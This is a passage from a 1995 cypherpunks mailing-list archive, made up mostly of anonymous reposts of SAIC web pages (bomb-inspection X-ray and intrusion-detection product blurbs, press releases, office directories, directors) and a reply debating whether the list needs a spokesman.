> "na48985@anon.penet.fi".  I have added his name to the Cc: line so perhaps he
> would be so kind as to tell us about his "NoCeM" ("No see 'em!") software.


(Please note the new email address-- moose@cm.org).

I apologize for the delay in responding to your message -- I will be
putting a lot of information about NoCeM up on http://www.cm.org in
the next day or so.  You can also find information in the newsgroup
alt.nocem.misc (if you get it).

If these don't work for you, feel free to write to me, and I'd be
happy to send you whatever you need.

(cm)

=-=-=-=-=
Please note new address: moose@cm.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Sat, 30 Sep 95 04:04:19 PDT
To: cypherpunks@toad.com
Subject: RTR-3 Package/Bomb Inspection System
Message-ID: <199509301104.HAA21361@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.saic.com/products/rtis/rtr3.html


   *** Products and Services ***
     
_________________________________________________________________

   
RTR-3

   
   [RTR-3 Package/Bomb Inspection System] (Click on the image to see a
   larger, 268 kb. photo.)

   Is a rugged one-man portable system for digital X-ray imaging in the
   field.

        The RTR-3 is a safe efficient tool for a wide range of Security
        applications.

   o It is ideal for: Small package inspection/bomb detection;
          Unexploded ordnance evaluation; Point-of-entry and Customs
          contraband detection; Nondestructive search and evaluation.

   o Quick and easy to set up, simple to operate with either battery or
          line voltage.

   o Lightweight (under 10 pounds), compact electronic imager with 8x10
          inch X-ray sensor. Images are displayed immediately after
          acquisition on the flat panel display.

   o Portable, lightweight (25 pounds with batteries) integrated
          control unit with 9.5-inch flat panel image display.

   o Single package portable X-ray source. Portable sources are used
          with either battery or line voltage.

   o RTR-3 images are archived digitally and can be transmitted by
          modem, or floppy disk, to other computers for more detailed
          evaluation, and/or to assemble a database.

          [RTR-3 Pipe bomb X-ray] (Click on the image to see a larger,
          156 kb. photo.)

          RTR-3 is a complete, one-man portable X-ray system capable of
          acquiring, enhancing, archiving, and transmitting radioscopic
          images in the field.

          The portable generator produces 20-25 very short bursts of
          X-rays in approximately one second during image acquisition
          resulting in very safe field operation.

          A familiar Microsoft Windows user interface permits efficient
          operation of the system and provides access to many image
          enhancement capabilities of the digital image processor.

          The RTR-3 features contrast stretch, zoom, pan and scroll,
          sharpening, smoothing, storage to hard or floppy disk, and
          transmission of images by modem.

          The RTR-3 ships in two rugged light-weight containers for
          maximum field portability.

          Click here for SPEC sheet.

          For more information, comments, or questions, send email to
          John Reed (619) 458-3797 or to Nicholas Vagelatos (619)
          458-3769, Fax (619) 458-3718.
          
            
__________________________________________________________
          
          The right to download and store or output this 
information is
          granted to users for their personal use only. Any 
other
          reproduction, by any means mechanical or electronic, 
without
          the express written permission of Science 
Applications
          International Corp. is strictly prohibited. (C) 
Copyright,
          1995, SAIC. All rights reserved. 
            
__________________________________________________________
          
          Copyright SAIC Home
            
__________________________________________________________
          
    Last updated on 07-10-95






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Sat, 30 Sep 95 04:09:16 PDT
To: cypherpunks@toad.com
Subject: Computer Misuse Detection System
Message-ID: <199509301109.HAA21436@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.saic.com/products/cmds/index.html


   *** Products and Services ***
     
_________________________________________________________________

   
                       COMPUTER MISUSE DETECTION SYSTEM
                                       
                [CMDS]
                
   Caught in the Act
          Until now, computer misuse could not be detected until after
          the damage was done. With CMDS, the system alerts you to
          suspicious computer activity as it takes place so you can react
          immediately.

   Round the Clock Security
          CMDS never sleeps. Computer misuse characteristically takes
          place at times when you are not expecting it. If an intruder
          rattles your door knob at 2:00 AM, CMDS is there to watch the
          shop.

   Make the Intruders Think Twice
          Knowing that security software of this type is installed will
          give the potential misusers reason to reconsider their actions.
          CMDS affects the intruder's motivations by threatening them
          with unseen protection. Like police radar, they won't know it's
          there until they've been caught!

   Security Through Pictures
          If a picture is worth a thousand words, then CMDS speaks
          volumes about the security status of your network. The security
          trending reports show you, graphically, all the information you
          need to identify the intruders.

   Off-the-Rack or Tailor Made
          A well made suit off-the-rack can meet the needs of most people
          at tremendous cost savings. However, a tailor-made suit may be
          necessary when the person in need has special requirements.
          SAIC can tailor a system using CMDS core technology to meet any
          large heterogeneous network or detection requirements.

   Increase Efficiency While Reducing Cost, Time Spent, and Losses
          CMDS will increase efficiency of your security operations by
          performing faster than a manual review process. Your security
          staff will be freed up for other activities reducing your
          overall cost. Your losses will decrease through the deterrence
          and detection capabilities of CMDS.
          
   
     
_________________________________________________________________

   
More About CMDS...

          o Detecting Computer Crime
          o Product Description
          o Designed to Detect
          o Detection Capabilities
          o System Requirements
          o Licensing and More Information
          
   
     
_________________________________________________________________

   
Intrusion Detection Research Papers

          Audit Reduction and Misuse Detection in Heterogeneous
          Environments: Framework and Application.
          Click here to download Macintosh Microsoft Word 5.1 file
          (464K).
          
   
     
_________________________________________________________________

   
   Copyright SAIC Home
     
_________________________________________________________________

   
    Last updated on 07-10-95






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Sat, 30 Sep 95 04:13:37 PDT
To: cypherpunks@toad.com
Subject: SAIC Acquires Network Solutions
Message-ID: <199509301113.HAA21552@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.saic.com/corporate/news/news03-15-95.html


   *** About SAIC ***
  
     
_________________________________________________________________

   
   SAIC ACQUIRES NETWORK SOLUTIONS, INC.
   
   (MCLEAN, VA) March 15, 1995 -- Science Applications International
   Corporation (SAIC) has acquired Network Solutions, Inc., a world
   leader in networking technology and applications.

   Network Solutions, Inc. is headquartered in Herndon, Virginia and will
   become a wholly owned subsidiary of SAIC. Terms of the acquisition
   were not disclosed.

   Network Solutions, Inc. was established in 1979 and has major clients
   in the federal government market, state and local market, and
   commercial market. Network Solutions, Inc. manages the worldwide
   registration services for the Internet and has significant expertise
   in local and wide area interoperability technologies. Network
   Solutions, Inc. currently supports two major Network Information
   Centers: The InterNIC and the Defense Data Network NIC.

   "The addition of Network Solutions, Inc. to SAIC brings a world-class
   networking business into our growing complex of communications and
   computing capability," said Dr. J. Robert Beyster, founder, chairman
   and chief executive officer of SAIC. "We see growth in this market
   segment as unlimited for us in the future."

   "We are extremely pleased to have Network Solutions, Inc. joining one
   of the most dynamic and successful growth firms in the world," said
   Emmit J. McHenry, chief executive officer of Network Solutions, Inc.
   "We anticipate explosive growth as we combine our networking expertise
   and experience with SAIC, a recognized leader in information
   technology and systems integration. The size and scope of SAIC will
   allow us to deliver our recognized excellence to a worldwide market."

   "The acquisition of Network Solutions, Inc. is the key next step in
   our strategy of building a full spectrum, full service global
   information technology business," said Michael A. Daniels, senior vice
   president and general manager of the Technology Applications Sector of
   SAIC. "We now work with clients on major engagements in the federal
   government market, the commercial market, and the state and local
   government market in both the United States and overseas. With the
   acquisition of Network Solutions, Inc. we complete the technology
   offering of our Systems and Network Integration line of business."

   SAIC is the largest employee-owned, high technology services and
   products company based in the United States. SAIC has annual revenues
   of $1.9 billion, 20,000 employees and over 300 office locations around
   the world. High technology services and products are focused in the
   core lines of business of information technology, systems integration,
   energy, environment, medical and health care systems and
   transportation. Founded in 1969, SAIC has completed its 26th
   consecutive year of record revenue and earnings.
   
   
     
_________________________________________________________________

   
   Copyright SAIC Home
     
_________________________________________________________________

   
    Last updated on 07-05-95






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Sat, 30 Sep 95 04:16:25 PDT
To: cypherpunks@toad.com
Subject: SAIC Shows Crime-Fighting Technology
Message-ID: <199509301116.HAA21636@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.saic.com/corporate/news/news03-17-95.html


   *** About SAIC ***
   
     
_________________________________________________________________

   
   SAIC SHOWS CRIME-FIGHTING TECHNOLOGY
   
   (SAN DIEGO, CA) March 17, 1995 -- Illegal contraband hidden in trucks,
   boats and airplanes can be detected with the assistance of
   state-of-the-art technology developed by Science Applications
   International Corporation (SAIC).

   The portable system is being demonstrated Friday as part of the
   opening of the federal Border Research and Technology Center at the
   Otay Mesa port-of-entry. The center, which has been established
   through the efforts of San Diego U.S. Attorney Alan D. Bersin, will be
   the focal point for driving the design, development, manufacture and
   acquisition of specialized law-enforcement technologies. The center is
   expected to identify specific programs for development that could be
   used by a variety of law-enforcement agencies.

   Various technologies for fighting cross-border crime will be
   demonstrated during a mock Otay border crossing by a driver attempting
   to evade the law.

   San Diego-based SAIC's portable contraband detection system scans
   inaccessible areas such as wheel wells, bumpers, boat hulls and
   aircraft fuselages. The system uses a micro-processor, a
   self-contained low-level radioactive sources and a sensitive detector.
   As surfaces are scanned, concealed objects including weapons,
   narcotics, alcohol and explosives reflect the radiation, which is
   sensed by the detector.

   The system operator is alerted by both a backlit digital display,
   visible in all light conditions, and an audio beeper that increases in
   rate as the contraband is detected. The handheld system's total weight
   is about two pounds.

   SAIC also will show how vehicles can be "tagged" by radio transponders
   which can provide positive identification of cars, trucks or trains
   passing through a specific area. Already in use by several
   SAIC-equipped automated toll collection systems across the U.S., the
   transponders or "tags" are issued to specific vehicles. Attached to
   bumpers or placed on dashboards, the tags are read as the vehicle
   passes near an antenna installed over or at the side of the roadway.
   The signal is displayed on a computer screen, and the data is stored
   and available for further use.

   The system could be used to speed commuters or other law-abiding
   vehicles regularly crossing the border. Violators can be caught
   because the "smart" system senses when a vehicle crosses without a
   tag, and can trigger alarms, crossing gates or other barriers, as well
   as recording the violator on video tape. Operators can electronically
   enhance license plate photos to be read clearly and process
   enforcement action.

   "We at SAIC are encouraged by the opening of the Border Research
   Technology Center today. This Center will provide the opportunity to
   apply high-technology solutions in support of increased trade as a
   result of NAFTA as well as support national law enforcement efforts at
   the border," said Dr. Donald M. Kerr, executive corporate vice
   president of SAIC.

   SAIC also provides other vehicle tracking systems that can trace the
   movements of railroad cars and detect motorists who evade barriers
   such as railroad grade crossings. The high-technology company also has
   developed methods of tracing small motorized boats, submersibles and
   even swimmers crossing strategic waterways, as well as other imaging
   applications.

   SAIC provides services and products to government and the private
   sector in the areas of law enforcement, transportation, energy,
   environment, health care and systems integration. With annual revenues
   of $1.9 billion, the company and its subsidiaries have nearly 20,000
   employees and more than 300 locations worldwide.
   
   
     
_________________________________________________________________

   
   Copyright SAIC Home
     
_________________________________________________________________

   
    Last updated on 07-05-95






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Sat, 30 Sep 95 04:19:06 PDT
To: cypherpunks@toad.com
Subject: SAIC's FBI ID System
Message-ID: <199509301118.HAA21682@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.saic.com/corporate/news/news8-23-94.html


   *** About SAIC ***
   
     
_________________________________________________________________

   
   SAIC TEAM TO DEVELOP MULTIMILLION-DOLLAR
   FBI IDENTIFICATION SYSTEM
   
   (MCLEAN, VA,) August 23, 1994 -- SAIC (Science Applications
   International Corporation) has won a major contract to design and
   develop the FBI's Interstate Identification Index computer system.
   This system is an on-line criminal history database which will support
   federal, state, and local law enforcement agencies via the National
   Crime Information Center network.

   Under the 8-year contract, the SAIC team will design, implement, and
   provide operations and maintenance support for the Interstate
   Identification Index. The contract has an estimated value of $27.6
   million.

   "The Interstate Identification Index project contributes to our
   company's goals to provide quality technical products and services for
   the security and well-being of our nation," said SAIC Project Manager
   Shelley Parker. "SAIC has been working for the FBI in this area for
   the last 10 years. Our expertise and personal commitment to this
   program made it particularly important to the company."

   Development and integration work will be performed in SAIC's Software
   and System Integration Group in the McLean, VA facility by a team of
   engineers who have worked for many years on this application. The team
   will be augmented by new staff members with specialized expertise for
   the new system.

   SAIC provides innovative services and products to government and the
   private sector in the areas of systems integration, energy,
   environment and transportation. The company, which is the largest
   employee-owned high-technology firm in the nation, has annual revenues
   of $1.67 billion and 16,000 employees in more than 250 locations
   worldwide.
   
   
     
_________________________________________________________________

   
   Copyright SAIC Home
     
_________________________________________________________________

   
    Last updated on 07-05-95






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Sat, 30 Sep 95 04:33:30 PDT
To: cypherpunks@toad.com
Subject: SAIC in VA
Message-ID: <199509301133.HAA22001@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.saic.com/business/locations/va.html


   **** Business Directory ****
     
_________________________________________________________________

   
                               SAIC IN VIRGINIA
                                       
     * Alexandria
          + Alexandria/Eisenhower Ave. (Loc. 238)
          + Alexandria/DMSO (Loc. 692)
          + Alexandria/DTG (Loc. 691)
          + Alexandria/JHK (Loc. 801)
          + Alexandria/MARITIME SERV DIV (Loc. 365)
          + Alexandria/TSC (Loc. 694)
          + Washington D.C./AMSEC (Loc.347)
     * Arlington
          + Arlington/Jefferson Davis HWY (Loc. 294)
          + Arlington/AMSEC (Loc. 678)
          + Arlington/BALLSTON (Loc. 765)
          + Arlington/CAPS (Loc. 785)
          + Arlington/CM (Loc. 573)
          + Arlington/CON. SUP. Facility (Loc. 964)
          + Arlington/CSI ADV. APP. DIV. (Loc. 963)
          + Arlington/CSM & AT (Loc. 402)
          + Arlington/CSS (Loc. 309)
          + Arlington/FSD (Loc. 784)
          + Arlington/ICITAP (Loc. 769)
          + Arlington/LEO (Loc. 587)
          + Arlington/MOSES (Loc. 612)
          + Arlington/RDO (Loc. 783)
          + Arlington/SAI T (Loc. 329)
          + Arlington/SCT (Loc. 830)
          + Arlington/SEM (Loc. 711)
          + Arlington/SIM. TECH (Loc. 717)
          + Arlington/SIM. TECH (Loc. 990)
          + Arlington/TRG (Loc. 539)
          + Arlington/TRG (Loc. 668)
          + Arlington/TTG (Loc. 708)
          + Crystal City (Loc. 508)
          + Virginia Square/ATG (Loc. 215)
     * Dahlgren
          + Dahlgren/Danube Drive (Loc. 226)
          + Dahlgren/AMSEC (Loc. 716)
     * Chantilly
          + Chantilly/NSI (Loc. 944)
     * Falls Church
          + Falls Church/EHSG (Loc. 052)
          + Falls Church/HCTG (Loc. 456)
          + Falls Church/SKYLINE/TAG (Loc. 284)
     * Ft. Belvoir
          + Ft. Belvoir (Loc. 709)
     * Hampton
          + Hampton/Enterprise Parkway (Loc. 761)
          + Hampton/Enterprise Parkway (Loc. 833)
          + Hampton/Enterprise Parkway (Loc. 256)
          + Hampton/Command & Control (Loc. 550)
          + Hampton/NASA LANGLEY (Loc. 618)
     * Herndon
          + Herndon/TAG (Loc. 946)
     * King George
          + King George/NAVSWC (Loc. 924)
     * Lynchburg
          + Lynchburg/Timberlake Road (Loc. 212)
     * McLean
          + McLean (Loc. 049)
          + McLean/COMSYSTEMS (Loc. 092)
          + McLean/ENTERPRISE CENTER (Loc. 747)
          + McLean/TE&A (Loc. 741)
          + McLean/TOWER (Loc. 015)
     * Newington
          + Newington/CVR (Loc. 474)
     * Norfolk
          + Norfolk/Plume Street (Loc. 441)
          + Norfolk/RE WRIGHT (Loc. 931)
     * Petersburg
          + Petersburg/NSSSG (Loc. 638)
     * Portsmouth
          + Tidewater/CHCS (Loc. 649)
     * Reston
          + Reston/EITS (Loc. 641)
     * Richmond
          + Richmond/NSI (Loc. 951)
     * Virginia Beach
          + Virginia Beach/SEG (Loc. 282)
          + Corp Office/AMSEC (Loc. 346)
            
   
     
_________________________________________________________________

   
   Copyright SAIC Home
     
_________________________________________________________________

   
    Last updated on 09-07-95






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Sat, 30 Sep 95 04:35:27 PDT
To: cypherpunks@toad.com
Subject: SAIC in MD
Message-ID: <199509301135.HAA22051@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.saic.com/business/locations/md.html


   **** Business Directory ****
     
_________________________________________________________________

   
                               SAIC IN MARYLAND
                                       
     * Abingdon
          + Abingdon/Continental Drive (Loc. 591)
     * Annapolis
          + Annapolis/TRG (Loc. 178)
          + Annapolis/WOR (Loc. 241)
     * Baltimore
          + Baltimore/White Marsh (Loc. 221)
     * Bethesda
          + Bethesda/CHCS (Loc. 498)
     * California
          + California/SCT (Loc. 827)
     * Columbia
          + Columbia/Ideas Group (Loc. 905)
          + Columbia/MSO (Loc. 473)
          + Columbia/SSIG (Loc. 315)
     * Fort Ritchie
          + Ft. Ritchie (Loc. 700)
     * Frederick
          + Frederick (Loc. 519)
          + Frederick/FCRDC (Loc. 970)
          + Frederick/PAI (Loc. 512)
          + Frederick/PAI Amin. Office (Loc. 575)
          + Frederick/Spectrum Drive (Loc. 750)
     * Gaithersburg
          + Gaithersburg/Professional Drive (Loc. 134)
          + Gaithersburg/QUINCE DIAMOND (Loc. 725)
          + Gaithersburg/UTILITY SVCS (Loc. 555)
     * Germantown
          + Germantown/Century Blvd. (Loc. 292)
          + Germantown/BELLEMEADE III (Loc. 854)
     * Hagerstown
          + Hagerstown/DTG (Loc. 652)
     * Hanover
          + Hanover/Ashton Road (Loc. 745)
     * Joppatowne
          + Joppatowne/SAIC (Loc. 220)
          + Joppatowne/TDG (Loc. 303)
     * Lanham
          + Maryland/SYNTONIC (Loc. 860)
     * Laurel
          + Laurel/GSC (Loc. 661)
     * Rockville
          + Rockville/ NSI (Loc. 953)
     * Silver Spring
          + Silver Spring/ADELPHI (Loc. 908)
          + Silver Spring/WHITE OAK (Loc. 563)
     * Towson
          + Towson/JHK (Loc. 803)
     * Westminister
          + Westminister/RE WRIGHT (Loc. 930)
            
   
     
_________________________________________________________________

   
   Copyright SAIC Home
     
_________________________________________________________________

   
    Last updated on 09-07-95






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Sat, 30 Sep 95 04:44:17 PDT
To: cypherpunks@toad.com
Subject: SAIC Global Web
Message-ID: <199509301144.HAA22231@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.saic.com/business/locations/index.html


   *** Business Directory ***
     
_________________________________________________________________

   
U.S. Locations Alphabetical List

 o Alabama         o Illinois        o Nebraska        o Rhode Island
 o Alaska          o Indiana         o Nevada          o South Carolina
 o Arizona         o Kansas          o New Hampshire   o South Dakota
 o Arkansas        o Kentucky        o New Jersey      o Tennessee
 o California      o Louisiana       o New Mexico      o Texas
 o Colorado        o Maryland        o New York        o Utah
 o Connecticut     o Massachusetts   o North Carolina  o Virginia
 o Delaware        o Michigan        o North Dakota    o Washington
 o Florida         o Minnesota       o Ohio            o Washington D.C.
 o Georgia         o Mississippi     o Oklahoma        o West Virginia
 o Hawaii          o Missouri        o Oregon          o Wisconsin
 o Idaho           o Montana         o Pennsylvania    o Wyoming

     
_________________________________________________________________

   
    Last updated on 07-05-95

----------


URL: http://www.saic.com/business/locations/others.html


   *** Business Directory ***
     
_________________________________________________________________

   
International Locations Alphabetical List

  CANADA
     * Halifax
     * Montreal
     * Ottawa
     * Vancouver
       
  COLOMBIA
  
     * Colombia, LTDA.
       
  FRANCE
  
     * Paris La Defense/EUROPE (Loc. 596)
       
  GERMANY
  
     * Germany
     * Kaiserslautern/SCT (Loc. 826)
     * Landstuhl/CHCS
       
  HONG KONG

     * Hong Kong (Loc. 789)
       
  ICELAND

     * Keflavik/CHCS
       
  MEXICO

     * Mexico City
       
  RUSSIA

     * Moscow/MIR (Loc. 764)
       
  SPAIN

     * IBERSAIC (Loc. 693)
       
  UNITED KINGDOM

     * Aberdeen (Loc. 797)
     * Aberdeen/SAIC Ltd (Loc. 728)
     * Birmingham
     * Camberly UK/SAIT (Loc. 666)
     * Cambridge/TOP EXPRESS (Loc. 340)
     * IBM SAIC (Loc. 667)
     * London/Andrew Palmer (Loc. 798)
     * Meriden (Loc. 865)
     * Stockley Park (Loc. 884)
       
  
     
_________________________________________________________________

   
    Last updated on 07-05-95






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Sat, 30 Sep 95 04:47:48 PDT
To: cypherpunks@toad.com
Subject: SAIC in CA
Message-ID: <199509301147.HAA23372@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.saic.com/business/locations/ca.html


   **** Business Directory ****
     
_________________________________________________________________

   
                              SAIC IN CALIFORNIA
                                       
     * Anaheim
          + Anaheim/JHK (Loc. 807)
     * APO AP
          + Guam/Naval Hospital/CHCS (Loc. 984)
          + Japan/ETG (Loc. 427)
          + Japan/Misawa AB/CHCS (Loc. 987)
          + Japan/Okinawa/USNH/CHCS (Loc. 986)
          + Japan/Yokosuka/CHCS (Loc. 601)
          + Japan/Yokota AB/CHCS (Loc. 988)
          + Korea/COMSYS (Loc. 740)
          + Korea/ETG (Loc. 426)
          + Korea/Kunsan AB/CHCS (Loc. 576)
          + Korea/Osan AB/CHCS (Loc. 985)
     * Burlingame
          + Burlingame/EPRI (Loc.721)
     * Camarillo
          + Camarillo/Camino Ruiz (Loc. 161)
     * Camp Pendleton
          + Camp Pendleton/CHCS (Loc. 818)
     * Cardiff
          + Cardiff/ATLAS (Loc. 790)
     * Citrus Heights
          + Citrus Heights/NSI (Loc. 956)
     * Corona
          + Corona/AMSEC (Loc. 262)
     * Cupertino
          + Cupertino/Baywood Drive (Loc. 636)
     * Edwards AFB
          + Edwards AFB/CHCS (Loc. 883)
     * El Segundo
          + El Segundo/ASP (Loc. 328)
     * Emeryville
          + Emeryville/Berkeley/DTG (Loc. 251)
          + Emeryville/JHK (Loc. 804)
     * Fort Irwin
          + Fort Irwin/CHCS (Loc. 782)
     * Fountain Valley
          + Fountain Valley/MSO (Loc. 57)
     * Goleta
          + Goleta/MARIPRO (Loc. 182)
     * Laguna Hills
          + Laguna Hills/DTG (Loc. 331)
     * La Jolla
          + La Jolla/Cave Street (Loc. 450)
          + La Jolla/1200 Prospect (Loc. 626)
          + La Jolla/1299 Prospect (Loc. 544)
          + La Jolla/ITER (Loc. 623)
     * Lancaster
          + Lancaster (Loc. 938)
     * Lawndale
          + Lawndale/SCT (Loc. 823)
     * Lemoore
          + Lemoore/CHCS (Loc. 781)
     * Los Altos
          + Los Altos/El Camino Real (Loc. 008)
     * Los Angeles
          + Los Angeles AFB/CHCS (Loc. 885)
          + Los Angeles/Century City (Loc. 124)
          + Los Angeles/UCLA/Div. 284 (Loc. 605)
     * McClellan
          + McClellan AFB/TTG (Loc. 787)
     * Moffett Field
          + Moffett Field (Loc. 834)
          + Moffett Field (Loc. 920)
          + Moffett Field (Loc. 922)
     * Monterey
          + Monterey/Camino El Estero (Loc. 098)
     * Oxnard
          + Oxnard/AMSEC (Loc. 159)
     * Palo Alto
          + Palo Alto/SCT (Loc. 829)
     * Pasadena
          + Pasadena/JHK (Loc. 805)
     * Pleasanton
          + Pleasanton/Hopyard Road (Loc. 029)
     * Poway
          + Poway (Loc. 962)
   
     * Pt. Hueneme
          + Pt. Hueneme/CHCS (Loc. 841)
     * Ridgecrest
          + Ridgecrest/STG (Loc. 336)
     * Riverside
          + Riverside/JHK (Loc. 810)
          + Riverside/NSI (Loc. 955)
     * San Bernardino
          + San Bernardino/NSI (Loc. 945)
     * Sacramento
          + Sacramento/LEO (Loc. 580)
     * San Diego
          + San Diego/AMSEC (Loc. 348)
          + San Diego/Campus Pt. A (Loc. 245)
          + San Diego/Campus Pt. C (Loc. 001)
          + San Diego/Campus Pt. D (Loc. 094)
     * San Diego/Campus Pt. E (Loc. 461)
     * San Diego/Campus Pt. F (Loc. 399)
     * San Diego/Campus Pt. G (Loc. 599)
     * San Diego/Campus Pt. K (Loc. 548)
     * San Diego/CHCS (Loc. 703)
     * San Diego/ESG (Loc. 973)
     * San Diego/Fourwinds (Loc. 312)
     * San Diego/MARITIME SERV DIV (Loc. 363)
     * San Diego/MEG (Loc. 677)
     * San Diego/MTO (Loc. 408)
     * San Diego/Old Town (Loc. 552)
     * San Diego/SAIC (Loc. 218)
     * San Diego/SAI T/Campus Pt. B (Loc. 291)
     * San Diego/SAI T/STPG (Loc. 358)
     * San Diego/SCRIPPS (Loc. 869)
     * San Diego/SED(668)/FCTCPAC (Loc. 673)
     * San Diego/SEG (Loc. 332)
     * San Diego/Wateridge (Loc. 021)
     * Sorrento Valley/(CSG) MANUFACTURING (Loc. 553)
     * Sorrento Valley/REC RES RET (Loc. 413)
     * Sorrento Valley/REMOTE SYS FAC (Loc. 337)
     * Sorrento Valley/SAI T (Loc. 002)
     * Sorrento Valley/SEA (Loc. 676)
       
   San Francisco
     * San Francisco/JDA (Loc. 933)
     * San Francisco/TSC (Loc. 457)
       
   San Jose
     * San Jose/C&I (Loc. 333)
       
   Santa Barbara
     * Santa Barbara/Ekwill Street (Loc. 216)
     * Santa Barbara/State Street (Loc. 786)
     * Santa Barbara/CSG (Loc. 431)
     * Santa Barbara/PSG (Loc. 439)
       
   Santa Clara
     * Santa Clara/Patrick Henry Drive (Loc. 007)
       
   Santa Ynez
     * Santa Ynez/Sagunto Street (Loc. 420)
       
   Thousand Oaks
     * Thousand Oaks/DTG (Loc. 730)
       
   Torrance
     * Torrance/Western Avenue (Loc. 005)
       
   Travis AFB
     * David Grant USAF MED CTR/CHCS (Loc. 671)
       
   Vallejo
     * Vallejo/COMSYS (Loc. 243)
     * Vandenberg AFB (Loc. 598)
     * Vandenberg AFB/CHCS (Loc. 882)
       
   Walnut Creek
     * Walnut Creek/HCTG (Loc. 518)
       
   Woodland Hills
     * Woodland Hills/JHK (Loc. 811)
       
   
     
_________________________________________________________________

   

   
    Last updated on 09-07-95






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Sat, 30 Sep 95 04:51:14 PDT
To: cypherpunks@toad.com
Subject: SAIC Directors
Message-ID: <199509301151.HAA23472@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL:
http://www.saic.com/corporate/annual-reports/1995/directors.html


   Board of Directors
     
_________________________________________________________________

   
   J.R. Beyster
   Chairman of the Board and
   Chief Executive Officer, SAIC

   L.A. Kull
   President and Chief Operating
   Officer, SAIC

   A.L. Alm
   Sector Vice President, SAIC

   V.N. Cook
   Chairman, Visions
   International, Inc.

   S.J. Dalich
   Executive Vice President, SAIC

   C.K. Davis
   International Health Care
   Consultant

   W.H. Demisch
   Managing Director, BT
   Securities Corp.

   E.A. Frieman
   Director, Scripps Institution of
   Oceanography; Vice Chancellor
   of Marine Sciences, UCSD

   J.E. Glancy
   Corporate Executive Vice
   President, SAIC

   F. Herwood
   SAIC Director Emeritus

   D.A. Hicks
   Chairman, Hicks & Associates,
   a subsidiary of SAIC

   B.R. Inman
   Admiral, USN (Ret.)

   D.M. Kerr
   Corporate Executive Vice
   President, SAIC

   M.R. Laird
   Senior Counselor, National
   and International Affairs, The
   Readers Digest Association Inc.

   W.M. Layson
   Senior Vice President, SAIC

   C.B. Malone
   President, Financial & Management Consulting Inc.

   J.W. McRary
   President and Chief Executive
   Officer, Microelectronics and
   Computer Technology Corp.

   B.J. Shillito
   SAIC Director Emeritus

   E.A. Straker
   Executive Vice President, SAIC

   M.R. Thurman
   General, USA (Ret.)

   M.E. Trout
   Chairman Emeritus,
   American Healthcare Systems

   J.H. Warner, Jr.
   Executive Vice President,
   SAIC

   J.A. Welch
   General, USAF (Ret.)

   J.B. Wiesler
   Vice Chairman, Bank of
   America (Ret.)

   W.E. Zisch
   SAIC Director Emeritus
     
_________________________________________________________________

   







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Sat, 30 Sep 95 05:00:40 PDT
To: cypherpunks@toad.com
Subject: SAIC in DC
Message-ID: <199509301200.IAA23661@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.saic.com/business/locations/dc.html


   **** Business Directory ****
     
_________________________________________________________________

   
                            SAIC IN WASHINGTON D.C.
                                       
     * P.O.S.T. (Loc. 126)
     * Walter Reed/CHCS (Loc. 497)
     * Walter Reed/GOV'T AFFAIRS (Loc. 235)
     * Washington D.C./SEASG (Loc. 288)
     * Washington D.C/CHEMONICS XPT (Loc. 821)
     * Washington D.C/ITG (Loc. 704)
     * Washington D.C./NSI (Loc. 969)
     * Washington D.C./OCRW (Loc. 482)
     * Washington D.C/QATSS HQ (Loc. 729)
     * Washington D.C./TCI (Loc. 991)
       
   
     
_________________________________________________________________

   

   
    Last updated on 07-06-95






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 30 Sep 95 08:59:48 PDT
To: jirib@cs.monash.edu.au
Subject: Re: Cypherpunks Press release
In-Reply-To: <199509300726.RAA28172@sweeney.cs.monash.edu.au>
Message-ID: <Pine.SUN.3.91.950930082349.14142A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 30 Sep 1995, Jiri Baum wrote:

> It seems to me that there are two viewpoints, 
>   * a spokesman would be useful, and
>   * a spokesman cannot be appointed due to lack of org
> 
> Which both seem to be true to me . . .

Well, neither seems true to me.  I don't see how, in the first
analysis, a spokesman would be useful to ME.  I am a Cypherpunk
by virtue of being on the mailing list, but I doubt most, and
certainly not all, list members would agree with everything I 
believe about privacy, encryption, freedom and the government.
I know I don't believe in a lot of the stuff I read here.  Why
would any of us want a spokesman other than themselves?  So I
ask, "useful" to whom?

Second, the reason a spokesman cannot be appointed is not due
to lack of [an?] organization, but rather the lack of any
unifying credo or statement of belief.  Had the list founders
said, "Cypherpunks is a list for people who believe X, Y and
Z.  Sign-up if you are one of us."  Then we might have an
